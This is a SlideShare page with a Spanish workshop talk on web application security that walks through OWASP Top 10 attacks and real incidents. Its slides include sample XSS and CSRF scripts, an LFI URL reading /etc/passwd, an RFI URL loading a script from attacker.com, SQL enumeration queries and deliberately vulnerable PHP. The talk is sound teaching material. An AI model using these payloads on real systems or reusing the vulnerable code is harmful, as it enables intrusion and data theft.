SlideShare una empresa de Scribd logo
1 de 28
IV Obradoiro de Criptografía, Privacidade e Seguridade



   Seguridad en Aplicaciones Web


                 Jose Mato Mariño
                       (FIC)
¿Cómo aprender seguridad web en la
                                FIC?
BBDD
Redes
PSI
IU

PHP
Javascript
SQL
You are sexy and they know it!!

SPAM
Robo información
Distribución Malware
Botnets
Viagra
OWASP Top 10 - 2010




Guia de prácticas y recomendaciones que deben
tenerse en cuenta en el desarrollo seguro de
aplicaciones web.

Aparecen las 10 técnicas más explotadas a la hora
de hackear o atacar una aplicación web.
OWASP TOP 10 – Del 2007 al 2010
Cross Site Scripting (XSS)
Técnica de inyección de comandos en el lado del
  cliente (navegador)
Lo que se busca es vulnerar al cliente, con el cuál
  sería posible llegar a vulnerar el servidor
Se inyecta código en parámetros que son recibidos
  por la Aplicación Web Y que son entregados
  directamente al cliente, donde se ejecutarán
Al ejecutarse en el navegador se tiene acceso al
  100% de los datos de sesión del cliente dando
  lugar a un montón de ataques distintos
XSS – FAILS eu2010
XSS – FAILS movistar
XSS - Reflected
El código no está en los repositorios de datos

La inyección va en un parámetro de la url por GET

El usuario tiene que hacer clic en un enlace
  preparado

http://example.com=buscar.php=
  <script>alert('XSS');</script>
XSS - Persistent
La inyección se almacena dentro de los repositorios
 de datos del servidor

Cuando alguien acceda a ese contenido se
 ejecutará (no hace falta que el usuario haga clic)
XSS - Consecuencias
Secuestrar el navegador de otro usuario, robo de
 sesión
Capturar información sensible que vean los usuarios
Defacement, phishing...
Envío dirigidos de exploits basados en navegador,
 BlackHole
Escaneo de puertos de equipos internos (en la red
 del usuario)
DEMO


XSS REFLECTED

ROBO DE SESIÓN
XSS - CSRF
Cross Site Request Forgery
Permite realizar acciones en la aplicación web
 vulnerada como si fuese el propio usuario el que
 las realiza

http://example.com?
  buscar.php=<script>document.location=
  'traspasar_jugador.php?
  player=Benzema&friend=Renata'</script>
XSS - Clickjacking
Inyección de iframe
Se carga una web (la ve el usuario)
Se pone capa transparente encima
El usuario hace clic en la web …
… pero antes en la capa transparente :)
Robo de clics => Autorizar acciones

Activar webcam, likejacking, tapjacking, ...
DEMO




ClickJacking

LikeJacking
Local File Inclusion (LFI)
El atacante intentará leer archivos a los que no tiene acceso




http://example.com/index.php?module=/etc/passwd
Remote File Inclusion (RFI)
Se inyecta un script (php, jsp, aspx, …) en la
 aplicación vulnerable
Webshell
Control del servidor

http://example.com/index.php?
  module=http://attacker.com/script.php

<?php require_once $_GET['module']; ?>
INSECURE OBJECT REFERENCE
http://example.com/expediente.php?alumno=1536

El atacante se da cuenta que 1536 es su
  identificador de alumno
El atacante modifica ese valor por otro
Accede a los expedientes de otros alumnos
El parámetro vulnerable puede estar en las
  peticiones por ajax (POST, GET)
SQL Injection
Técnica que
consiste en
modificar las
consultas al
origen de datos
alterádolas
para conseguir
nuestros
objetivos
SQL Injection - Objetivos
Suplantación de roles (usuario a admin)
Acceso a zonas no autorizadas
Información confidencial
Leer archivos del servidor (/etc/passwd,
  /etc/shadow)
Infección del site
…
SQL Injection - Lilupophilupop
Buscaba vulnerabilidades SQL Injection en dominios
 bajo ASP o Coldfusion con base de datos
 Microsoft SQL Server

Más de 1,000.000 de dominios afectados utilizados
 para distribuir malware, redirigiendo a los usuarios
 con XSS Persistente
SQL Injection - Lilupophilupop
SQL Injection - HBGary
http://www.hbgaryfederal.com/pages.php?pageNav=2&page=27
Listado de usuario con claves hasheadas
PERO Aaron Barr tenía letras minúsculas y números
  únicamente, por lo tanto...
Acceso al CMS
Reseteo claves correo a Aaron Barr
Ingeniería Social => acceso correo => SSH
NOTA: Aaron Barr utilizaba la
misma clave para varios servicios
SQL Injection - DEMO

    Buscar la vulnerabilidad
1. Nº de columnas
2. Tablas y BBDD
3. Columnas de tabla usuarios
4. Emails y passwords
5. Login :)
SQL Injection - MySQL
SELECT schema_name FROM
 information_schema.SCHEMATA

SELECT table_schema,table_name FROM
 information_schema.TABLES

SELECT column_name,column_type FROM
 information_schema.COLUMNS WHERE
 table_name='%s' AND table_schema='%s'
SQL Injection



login.php

SELECT *
FROM usuarios
WHERE email = '$_GET['email']'
AND password = '$_GET['password]'
Seguridad CMS



Plugins
Wordpress => wpscan
Joomla => joomlascan
IV Obradoiro de Criptografía, Privacidade e Seguridade




               [EOF]
             Gracias :)
                Jose Mato Mariño
                      (FIC)

Más contenido relacionado

La actualidad más candente

[Flisol2011] Seguridad en el Desarrollo de Aplicaciones Web PHP
[Flisol2011] Seguridad en el Desarrollo de Aplicaciones Web PHP[Flisol2011] Seguridad en el Desarrollo de Aplicaciones Web PHP
[Flisol2011] Seguridad en el Desarrollo de Aplicaciones Web PHP7th_Sign
 
Webinar Gratuito: Cross-Site Scripting (XSS)
Webinar Gratuito: Cross-Site Scripting (XSS)Webinar Gratuito: Cross-Site Scripting (XSS)
Webinar Gratuito: Cross-Site Scripting (XSS)Alonso Caballero
 
Vulnerabilidades en sitios web(español)
Vulnerabilidades en sitios web(español)Vulnerabilidades en sitios web(español)
Vulnerabilidades en sitios web(español)Miguel de la Cruz
 
Samurai Web Testing Framework 2.0
Samurai Web Testing Framework 2.0Samurai Web Testing Framework 2.0
Samurai Web Testing Framework 2.0Alonso Caballero
 
Vulnerabilidades en Aplicaciones Web PHP
Vulnerabilidades en Aplicaciones Web PHPVulnerabilidades en Aplicaciones Web PHP
Vulnerabilidades en Aplicaciones Web PHPMoises Silva
 
Resumen curso de seguridad para desarrolladores de aplicaciones web y móviles...
Resumen curso de seguridad para desarrolladores de aplicaciones web y móviles...Resumen curso de seguridad para desarrolladores de aplicaciones web y móviles...
Resumen curso de seguridad para desarrolladores de aplicaciones web y móviles...mauromaulinir
 
Azpe informatica consejos navegar seguros por internet
Azpe informatica consejos navegar seguros por internetAzpe informatica consejos navegar seguros por internet
Azpe informatica consejos navegar seguros por internetAzpe Informatica
 
Navegar correctamente en internet
Navegar correctamente en internetNavegar correctamente en internet
Navegar correctamente en internetXitalia
 
Dns malware iicybersecurity
Dns malware iicybersecurityDns malware iicybersecurity
Dns malware iicybersecurityDavid Thomas
 
Taller 3 informatika recursos
Taller 3 informatika recursosTaller 3 informatika recursos
Taller 3 informatika recursosssparza_abril
 
Presentación1.ppt seguridad en en internet
Presentación1.ppt seguridad en en internetPresentación1.ppt seguridad en en internet
Presentación1.ppt seguridad en en internetmatichino
 
Amenazas en la web
Amenazas en la webAmenazas en la web
Amenazas en la webSandy Ortega
 
Trabajo de informatica
Trabajo de informaticaTrabajo de informatica
Trabajo de informaticaPR7ALCOR
 
Owasp top 10 2017
Owasp top 10 2017Owasp top 10 2017
Owasp top 10 2017yopablo
 

La actualidad más candente (20)

[Flisol2011] Seguridad en el Desarrollo de Aplicaciones Web PHP
[Flisol2011] Seguridad en el Desarrollo de Aplicaciones Web PHP[Flisol2011] Seguridad en el Desarrollo de Aplicaciones Web PHP
[Flisol2011] Seguridad en el Desarrollo de Aplicaciones Web PHP
 
Webinar Gratuito: Cross-Site Scripting (XSS)
Webinar Gratuito: Cross-Site Scripting (XSS)Webinar Gratuito: Cross-Site Scripting (XSS)
Webinar Gratuito: Cross-Site Scripting (XSS)
 
Vulnerabilidades en sitios web(español)
Vulnerabilidades en sitios web(español)Vulnerabilidades en sitios web(español)
Vulnerabilidades en sitios web(español)
 
Seguridad web
Seguridad webSeguridad web
Seguridad web
 
Samurai Web Testing Framework 2.0
Samurai Web Testing Framework 2.0Samurai Web Testing Framework 2.0
Samurai Web Testing Framework 2.0
 
Seguridad en php
Seguridad en phpSeguridad en php
Seguridad en php
 
as
asas
as
 
Vulnerabilidades en Aplicaciones Web PHP
Vulnerabilidades en Aplicaciones Web PHPVulnerabilidades en Aplicaciones Web PHP
Vulnerabilidades en Aplicaciones Web PHP
 
Resumen curso de seguridad para desarrolladores de aplicaciones web y móviles...
Resumen curso de seguridad para desarrolladores de aplicaciones web y móviles...Resumen curso de seguridad para desarrolladores de aplicaciones web y móviles...
Resumen curso de seguridad para desarrolladores de aplicaciones web y móviles...
 
Azpe informatica consejos navegar seguros por internet
Azpe informatica consejos navegar seguros por internetAzpe informatica consejos navegar seguros por internet
Azpe informatica consejos navegar seguros por internet
 
Navegar correctamente en internet
Navegar correctamente en internetNavegar correctamente en internet
Navegar correctamente en internet
 
Seguridad de las web 2.0
Seguridad de las web 2.0Seguridad de las web 2.0
Seguridad de las web 2.0
 
Que es xss
Que es xssQue es xss
Que es xss
 
web 1.0, 2.0 y 3.0
web 1.0, 2.0 y 3.0web 1.0, 2.0 y 3.0
web 1.0, 2.0 y 3.0
 
Dns malware iicybersecurity
Dns malware iicybersecurityDns malware iicybersecurity
Dns malware iicybersecurity
 
Taller 3 informatika recursos
Taller 3 informatika recursosTaller 3 informatika recursos
Taller 3 informatika recursos
 
Presentación1.ppt seguridad en en internet
Presentación1.ppt seguridad en en internetPresentación1.ppt seguridad en en internet
Presentación1.ppt seguridad en en internet
 
Amenazas en la web
Amenazas en la webAmenazas en la web
Amenazas en la web
 
Trabajo de informatica
Trabajo de informaticaTrabajo de informatica
Trabajo de informatica
 
Owasp top 10 2017
Owasp top 10 2017Owasp top 10 2017
Owasp top 10 2017
 

Similar a Seguridad en aplicaciones web

Seguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_securitySeguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_securityseguridadelinux
 
Art hack web-v1-4
Art hack web-v1-4Art hack web-v1-4
Art hack web-v1-4esmartcrimt
 
Seguridad en la web
Seguridad en la webSeguridad en la web
Seguridad en la webTensor
 
Seguridad en la web
Seguridad en la webSeguridad en la web
Seguridad en la webTensor
 
Seguridad en la web
Seguridad en la webSeguridad en la web
Seguridad en la webTensor
 
Seguridad en la web
Seguridad en la webSeguridad en la web
Seguridad en la webTensor
 
Seguridad en la web
Seguridad en la webSeguridad en la web
Seguridad en la webTensor
 
Client side attacks in web applications
Client side attacks in web applicationsClient side attacks in web applications
Client side attacks in web applicationsEventos Creativos
 
Presentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona SeguridadPresentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona Seguridadguestbfa74a
 
Vulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones WebVulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones WebAlonso Caballero
 
Cómo realizar un test de intrusión a una aplicación Web
Cómo realizar un test de intrusión a una aplicación WebCómo realizar un test de intrusión a una aplicación Web
Cómo realizar un test de intrusión a una aplicación WebEduardo Jalon
 
Webinar Gratuito: Inyección de Comandos
Webinar Gratuito: Inyección de ComandosWebinar Gratuito: Inyección de Comandos
Webinar Gratuito: Inyección de ComandosAlonso Caballero
 
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)kernelinux
 
Reporte de Seguridad
Reporte de SeguridadReporte de Seguridad
Reporte de Seguridadkiensoiyo
 
Los 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo WebLos 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo Webacksec
 

Similar a Seguridad en aplicaciones web (20)

Seguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_securitySeguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_security
 
Art hack web-v1-4
Art hack web-v1-4Art hack web-v1-4
Art hack web-v1-4
 
Seguridad en la web
Seguridad en la webSeguridad en la web
Seguridad en la web
 
Seguridad en la web
Seguridad en la webSeguridad en la web
Seguridad en la web
 
Seguridad en la web
Seguridad en la webSeguridad en la web
Seguridad en la web
 
Seguridad en la web
Seguridad en la webSeguridad en la web
Seguridad en la web
 
Seguridad en la web
Seguridad en la webSeguridad en la web
Seguridad en la web
 
Client side attacks in web applications
Client side attacks in web applicationsClient side attacks in web applications
Client side attacks in web applications
 
Presentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona SeguridadPresentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona Seguridad
 
Seguridad en PHP (es)
Seguridad en PHP (es)Seguridad en PHP (es)
Seguridad en PHP (es)
 
WebAttack - Presentación
WebAttack - PresentaciónWebAttack - Presentación
WebAttack - Presentación
 
Seguridad WEB - Principios básicos.
Seguridad WEB - Principios básicos.Seguridad WEB - Principios básicos.
Seguridad WEB - Principios básicos.
 
Vulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones WebVulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones Web
 
Web app attacks
Web app attacksWeb app attacks
Web app attacks
 
Cómo realizar un test de intrusión a una aplicación Web
Cómo realizar un test de intrusión a una aplicación WebCómo realizar un test de intrusión a una aplicación Web
Cómo realizar un test de intrusión a una aplicación Web
 
Webinar Gratuito: Inyección de Comandos
Webinar Gratuito: Inyección de ComandosWebinar Gratuito: Inyección de Comandos
Webinar Gratuito: Inyección de Comandos
 
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
 
Reporte de Seguridad
Reporte de SeguridadReporte de Seguridad
Reporte de Seguridad
 
Los 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo WebLos 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo Web
 
Completo conferencia seguridad_web_software_libre_2015
Completo conferencia seguridad_web_software_libre_2015Completo conferencia seguridad_web_software_libre_2015
Completo conferencia seguridad_web_software_libre_2015
 

Último

ORGANIZACIÓN SOCIAL INCA EN EL TAHUANTINSUYO.pptx
ORGANIZACIÓN SOCIAL INCA EN EL TAHUANTINSUYO.pptxORGANIZACIÓN SOCIAL INCA EN EL TAHUANTINSUYO.pptx
ORGANIZACIÓN SOCIAL INCA EN EL TAHUANTINSUYO.pptxnandoapperscabanilla
 
Registro Auxiliar - Primaria 2024 (1).pptx
Registro Auxiliar - Primaria  2024 (1).pptxRegistro Auxiliar - Primaria  2024 (1).pptx
Registro Auxiliar - Primaria 2024 (1).pptxFelicitasAsuncionDia
 
GUIA DE CIRCUNFERENCIA Y ELIPSE UNDÉCIMO 2024.pdf
GUIA DE CIRCUNFERENCIA Y ELIPSE UNDÉCIMO 2024.pdfGUIA DE CIRCUNFERENCIA Y ELIPSE UNDÉCIMO 2024.pdf
GUIA DE CIRCUNFERENCIA Y ELIPSE UNDÉCIMO 2024.pdfPaolaRopero2
 
BIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICA
BIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICABIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICA
BIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICAÁngel Encinas
 
LABERINTOS DE DISCIPLINAS DEL PENTATLÓN OLÍMPICO MODERNO. Por JAVIER SOLIS NO...
LABERINTOS DE DISCIPLINAS DEL PENTATLÓN OLÍMPICO MODERNO. Por JAVIER SOLIS NO...LABERINTOS DE DISCIPLINAS DEL PENTATLÓN OLÍMPICO MODERNO. Por JAVIER SOLIS NO...
LABERINTOS DE DISCIPLINAS DEL PENTATLÓN OLÍMPICO MODERNO. Por JAVIER SOLIS NO...JAVIER SOLIS NOYOLA
 
Estrategia de prompts, primeras ideas para su construcción
Estrategia de prompts, primeras ideas para su construcciónEstrategia de prompts, primeras ideas para su construcción
Estrategia de prompts, primeras ideas para su construcciónLourdes Feria
 
AFICHE EL MANIERISMO HISTORIA DE LA ARQUITECTURA II
AFICHE EL MANIERISMO HISTORIA DE LA ARQUITECTURA IIAFICHE EL MANIERISMO HISTORIA DE LA ARQUITECTURA II
AFICHE EL MANIERISMO HISTORIA DE LA ARQUITECTURA IIIsauraImbrondone
 
Programacion Anual Matemática4 MPG 2024 Ccesa007.pdf
Programacion Anual Matemática4    MPG 2024  Ccesa007.pdfProgramacion Anual Matemática4    MPG 2024  Ccesa007.pdf
Programacion Anual Matemática4 MPG 2024 Ccesa007.pdfDemetrio Ccesa Rayme
 
OCTAVO SEGUNDO PERIODO. EMPRENDIEMIENTO VS
OCTAVO SEGUNDO PERIODO. EMPRENDIEMIENTO VSOCTAVO SEGUNDO PERIODO. EMPRENDIEMIENTO VS
OCTAVO SEGUNDO PERIODO. EMPRENDIEMIENTO VSYadi Campos
 
Caja de herramientas de inteligencia artificial para la academia y la investi...
Caja de herramientas de inteligencia artificial para la academia y la investi...Caja de herramientas de inteligencia artificial para la academia y la investi...
Caja de herramientas de inteligencia artificial para la academia y la investi...Lourdes Feria
 
plande accion dl aula de innovación pedagogica 2024.pdf
plande accion dl aula de innovación pedagogica 2024.pdfplande accion dl aula de innovación pedagogica 2024.pdf
plande accion dl aula de innovación pedagogica 2024.pdfenelcielosiempre
 
Curso = Metodos Tecnicas y Modelos de Enseñanza.pdf
Curso = Metodos Tecnicas y Modelos de Enseñanza.pdfCurso = Metodos Tecnicas y Modelos de Enseñanza.pdf
Curso = Metodos Tecnicas y Modelos de Enseñanza.pdfFrancisco158360
 
ACERTIJO DE LA BANDERA OLÍMPICA CON ECUACIONES DE LA CIRCUNFERENCIA. Por JAVI...
ACERTIJO DE LA BANDERA OLÍMPICA CON ECUACIONES DE LA CIRCUNFERENCIA. Por JAVI...ACERTIJO DE LA BANDERA OLÍMPICA CON ECUACIONES DE LA CIRCUNFERENCIA. Por JAVI...
ACERTIJO DE LA BANDERA OLÍMPICA CON ECUACIONES DE LA CIRCUNFERENCIA. Por JAVI...JAVIER SOLIS NOYOLA
 
actividades comprensión lectora para 3° grado
actividades comprensión lectora para 3° gradoactividades comprensión lectora para 3° grado
actividades comprensión lectora para 3° gradoJosDanielEstradaHern
 
SEXTO SEGUNDO PERIODO EMPRENDIMIENTO.pptx
SEXTO SEGUNDO PERIODO EMPRENDIMIENTO.pptxSEXTO SEGUNDO PERIODO EMPRENDIMIENTO.pptx
SEXTO SEGUNDO PERIODO EMPRENDIMIENTO.pptxYadi Campos
 
INSTRUCCION PREPARATORIA DE TIRO .pptx
INSTRUCCION PREPARATORIA DE TIRO   .pptxINSTRUCCION PREPARATORIA DE TIRO   .pptx
INSTRUCCION PREPARATORIA DE TIRO .pptxdeimerhdz21
 
Criterios ESG: fundamentos, aplicaciones y beneficios
Criterios ESG: fundamentos, aplicaciones y beneficiosCriterios ESG: fundamentos, aplicaciones y beneficios
Criterios ESG: fundamentos, aplicaciones y beneficiosJonathanCovena1
 

Último (20)

Fe contra todo pronóstico. La fe es confianza.
Fe contra todo pronóstico. La fe es confianza.Fe contra todo pronóstico. La fe es confianza.
Fe contra todo pronóstico. La fe es confianza.
 
Tema 8.- PROTECCION DE LOS SISTEMAS DE INFORMACIÓN.pdf
Tema 8.- PROTECCION DE LOS SISTEMAS DE INFORMACIÓN.pdfTema 8.- PROTECCION DE LOS SISTEMAS DE INFORMACIÓN.pdf
Tema 8.- PROTECCION DE LOS SISTEMAS DE INFORMACIÓN.pdf
 
ORGANIZACIÓN SOCIAL INCA EN EL TAHUANTINSUYO.pptx
ORGANIZACIÓN SOCIAL INCA EN EL TAHUANTINSUYO.pptxORGANIZACIÓN SOCIAL INCA EN EL TAHUANTINSUYO.pptx
ORGANIZACIÓN SOCIAL INCA EN EL TAHUANTINSUYO.pptx
 
Registro Auxiliar - Primaria 2024 (1).pptx
Registro Auxiliar - Primaria  2024 (1).pptxRegistro Auxiliar - Primaria  2024 (1).pptx
Registro Auxiliar - Primaria 2024 (1).pptx
 
GUIA DE CIRCUNFERENCIA Y ELIPSE UNDÉCIMO 2024.pdf
GUIA DE CIRCUNFERENCIA Y ELIPSE UNDÉCIMO 2024.pdfGUIA DE CIRCUNFERENCIA Y ELIPSE UNDÉCIMO 2024.pdf
GUIA DE CIRCUNFERENCIA Y ELIPSE UNDÉCIMO 2024.pdf
 
Power Point: Fe contra todo pronóstico.pptx
Power Point: Fe contra todo pronóstico.pptxPower Point: Fe contra todo pronóstico.pptx
Power Point: Fe contra todo pronóstico.pptx
 
BIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICA
BIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICABIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICA
BIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICA
 
LABERINTOS DE DISCIPLINAS DEL PENTATLÓN OLÍMPICO MODERNO. Por JAVIER SOLIS NO...
LABERINTOS DE DISCIPLINAS DEL PENTATLÓN OLÍMPICO MODERNO. Por JAVIER SOLIS NO...LABERINTOS DE DISCIPLINAS DEL PENTATLÓN OLÍMPICO MODERNO. Por JAVIER SOLIS NO...
LABERINTOS DE DISCIPLINAS DEL PENTATLÓN OLÍMPICO MODERNO. Por JAVIER SOLIS NO...
 
Estrategia de prompts, primeras ideas para su construcción
Estrategia de prompts, primeras ideas para su construcciónEstrategia de prompts, primeras ideas para su construcción
Estrategia de prompts, primeras ideas para su construcción
 
AFICHE EL MANIERISMO HISTORIA DE LA ARQUITECTURA II
AFICHE EL MANIERISMO HISTORIA DE LA ARQUITECTURA IIAFICHE EL MANIERISMO HISTORIA DE LA ARQUITECTURA II
AFICHE EL MANIERISMO HISTORIA DE LA ARQUITECTURA II
 
Programacion Anual Matemática4 MPG 2024 Ccesa007.pdf
Programacion Anual Matemática4    MPG 2024  Ccesa007.pdfProgramacion Anual Matemática4    MPG 2024  Ccesa007.pdf
Programacion Anual Matemática4 MPG 2024 Ccesa007.pdf
 
OCTAVO SEGUNDO PERIODO. EMPRENDIEMIENTO VS
OCTAVO SEGUNDO PERIODO. EMPRENDIEMIENTO VSOCTAVO SEGUNDO PERIODO. EMPRENDIEMIENTO VS
OCTAVO SEGUNDO PERIODO. EMPRENDIEMIENTO VS
 
Caja de herramientas de inteligencia artificial para la academia y la investi...
Caja de herramientas de inteligencia artificial para la academia y la investi...Caja de herramientas de inteligencia artificial para la academia y la investi...
Caja de herramientas de inteligencia artificial para la academia y la investi...
 
plande accion dl aula de innovación pedagogica 2024.pdf
plande accion dl aula de innovación pedagogica 2024.pdfplande accion dl aula de innovación pedagogica 2024.pdf
plande accion dl aula de innovación pedagogica 2024.pdf
 
Curso = Metodos Tecnicas y Modelos de Enseñanza.pdf
Curso = Metodos Tecnicas y Modelos de Enseñanza.pdfCurso = Metodos Tecnicas y Modelos de Enseñanza.pdf
Curso = Metodos Tecnicas y Modelos de Enseñanza.pdf
 
ACERTIJO DE LA BANDERA OLÍMPICA CON ECUACIONES DE LA CIRCUNFERENCIA. Por JAVI...
ACERTIJO DE LA BANDERA OLÍMPICA CON ECUACIONES DE LA CIRCUNFERENCIA. Por JAVI...ACERTIJO DE LA BANDERA OLÍMPICA CON ECUACIONES DE LA CIRCUNFERENCIA. Por JAVI...
ACERTIJO DE LA BANDERA OLÍMPICA CON ECUACIONES DE LA CIRCUNFERENCIA. Por JAVI...
 
actividades comprensión lectora para 3° grado
actividades comprensión lectora para 3° gradoactividades comprensión lectora para 3° grado
actividades comprensión lectora para 3° grado
 
SEXTO SEGUNDO PERIODO EMPRENDIMIENTO.pptx
SEXTO SEGUNDO PERIODO EMPRENDIMIENTO.pptxSEXTO SEGUNDO PERIODO EMPRENDIMIENTO.pptx
SEXTO SEGUNDO PERIODO EMPRENDIMIENTO.pptx
 
INSTRUCCION PREPARATORIA DE TIRO .pptx
INSTRUCCION PREPARATORIA DE TIRO   .pptxINSTRUCCION PREPARATORIA DE TIRO   .pptx
INSTRUCCION PREPARATORIA DE TIRO .pptx
 
Criterios ESG: fundamentos, aplicaciones y beneficios
Criterios ESG: fundamentos, aplicaciones y beneficiosCriterios ESG: fundamentos, aplicaciones y beneficios
Criterios ESG: fundamentos, aplicaciones y beneficios
 

Seguridad en aplicaciones web

  • 1. IV Obradoiro de Criptografía, Privacidade e Seguridade Seguridad en Aplicaciones Web Jose Mato Mariño (FIC)
  • 2. ¿Cómo aprender seguridad web en la FIC? BBDD Redes PSI IU PHP Javascript SQL
  • 3. You are sexy and they know it!! SPAM Robo información Distribución Malware Botnets Viagra
  • 4. OWASP Top 10 - 2010 Guia de prácticas y recomendaciones que deben tenerse en cuenta en el desarrollo seguro de aplicaciones web. Aparecen las 10 técnicas más explotadas a la hora de hackear o atacar una aplicación web.
  • 5. OWASP TOP 10 – Del 2007 al 2010
  • 6. Cross Site Scripting (XSS) Técnica de inyección de comandos en el lado del cliente (navegador) Lo que se busca es vulnerar al cliente, con el cuál sería posible llegar a vulnerar el servidor Se inyecta código en parámetros que son recibidos por la Aplicación Web Y que son entregados directamente al cliente, donde se ejecutarán Al ejecutarse en el navegador se tiene acceso al 100% de los datos de sesión del cliente dando lugar a un montón de ataques distintos
  • 7. XSS – FAILS eu2010
  • 8. XSS – FAILS movistar
  • 9. XSS - Reflected El código no está en los repositorios de datos La inyección va en un parámetro de la url por GET El usuario tiene que hacer clic en un enlace preparado http://example.com=buscar.php= <script>alert('XSS');</script>
  • 10. XSS - Persistent La inyección se almacena dentro de los repositorios de datos del servidor Cuando alguien acceda a ese contenido se ejecutará (no hace falta que el usuario haga clic)
  • 11. XSS - Consecuencias Secuestrar el navegador de otro usuario, robo de sesión Capturar información sensible que vean los usuarios Defacement, phishing... Envío dirigidos de exploits basados en navegador, BlackHole Escaneo de puertos de equipos internos (en la red del usuario)
  • 13. XSS - CSRF Cross Site Request Forgery Permite realizar acciones en la aplicación web vulnerada como si fuese el propio usuario el que las realiza http://example.com? buscar.php=<script>document.location= 'traspasar_jugador.php? player=Benzema&friend=Renata'</script>
  • 14. XSS - Clickjacking Inyección de iframe Se carga una web (la ve el usuario) Se pone capa transparente encima El usuario hace clic en la web … … pero antes en la capa transparente :) Robo de clics => Autorizar acciones Activar webcam, likejacking, tapjacking, ...
  • 16. Local File Inclusion (LFI) El atacante intentará leer archivos a los que no tiene acceso http://example.com/index.php?module=/etc/passwd
  • 17. Remote File Inclusion (RFI) Se inyecta un script (php, jsp, aspx, …) en la aplicación vulnerable Webshell Control del servidor http://example.com/index.php? module=http://attacker.com/script.php <?php require_once $_GET['module']; ?>
  • 18. INSECURE OBJECT REFERENCE http://example.com/expediente.php?alumno=1536 El atacante se da cuenta que 1536 es su identificador de alumno El atacante modifica ese valor por otro Accede a los expedientes de otros alumnos El parámetro vulnerable puede estar en las peticiones por ajax (POST, GET)
  • 19. SQL Injection Técnica que consiste en modificar las consultas al origen de datos alterádolas para conseguir nuestros objetivos
  • 20. SQL Injection - Objetivos Suplantación de roles (usuario a admin) Acceso a zonas no autorizadas Información confidencial Leer archivos del servidor (/etc/passwd, /etc/shadow) Infección del site …
  • 21. SQL Injection - Lilupophilupop Buscaba vulnerabilidades SQL Injection en dominios bajo ASP o Coldfusion con base de datos Microsoft SQL Server Más de 1,000.000 de dominios afectados utilizados para distribuir malware, redirigiendo a los usuarios con XSS Persistente
  • 22. SQL Injection - Lilupophilupop
  • 23. SQL Injection - HBGary http://www.hbgaryfederal.com/pages.php?pageNav=2&page=27 Listado de usuario con claves hasheadas PERO Aaron Barr tenía letras minúsculas y números únicamente, por lo tanto... Acceso al CMS Reseteo claves correo a Aaron Barr Ingeniería Social => acceso correo => SSH NOTA: Aaron Barr utilizaba la misma clave para varios servicios
  • 24. SQL Injection - DEMO Buscar la vulnerabilidad 1. Nº de columnas 2. Tablas y BBDD 3. Columnas de tabla usuarios 4. Emails y passwords 5. Login :)
  • 25. SQL Injection - MySQL SELECT schema_name FROM information_schema.SCHEMATA SELECT table_schema,table_name FROM information_schema.TABLES SELECT column_name,column_type FROM information_schema.COLUMNS WHERE table_name='%s' AND table_schema='%s'
  • 26. SQL Injection login.php SELECT * FROM usuarios WHERE email = '$_GET['email']' AND password = '$_GET['password]'
  • 27. Seguridad CMS Plugins Wordpress => wpscan Joomla => joomlascan
  • 28. IV Obradoiro de Criptografía, Privacidade e Seguridade [EOF] Gracias :) Jose Mato Mariño (FIC)

Notas del editor

  1. qwer